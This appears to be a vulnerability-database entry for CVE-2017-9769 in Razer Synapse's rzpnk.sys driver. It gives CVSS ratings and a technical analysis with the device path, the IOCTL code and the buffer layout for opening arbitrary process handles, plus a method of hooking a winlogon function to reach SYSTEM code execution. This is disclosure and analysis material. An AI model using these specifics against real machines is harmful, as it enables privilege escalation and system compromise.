Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
0

CVE-2017-9769

Disclosure Date: August 02, 2017
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.

Add Assessment

3
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

Analysis

The Razer rzpnk.sys driver exposes a device \\.\47CD78C9-64C3-47C2-B80F-677B887CF095 which can be used to open an handle to an arbitrary process from any user. A user needs to open a handle to this device and issue NtDeviceIoControlFile using the IOCTL 0x22a050 to trigger the vulnerable code path. The buffer to be passed to the process is the target PID to open and 0 packed as two QWORD values (buffer = [pid, 0].pack('QQ'). This ultimately leads to a call to ZwOpenProcess which does not perform as many security checks as NtOpenProcess, thus allowing a user to open a handle to an arbitrary process.

To gain code execution from this vulnerability, the user32!LockWindowStatoin function can be hooked within the winlogon process. This process and function are ideal targets because winlogon runs as NT_AUTHORITY\SYSTEM and the function can be triggered on demand. As a by product of exploiting this, the screen will be locked, which may tip off an observant user who is interacting with the system at the time of exploitation.

Exploitation of this vulnerability is quite reliable as it does not rely on memory corruption.

References

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Additional Info

Technical Analysis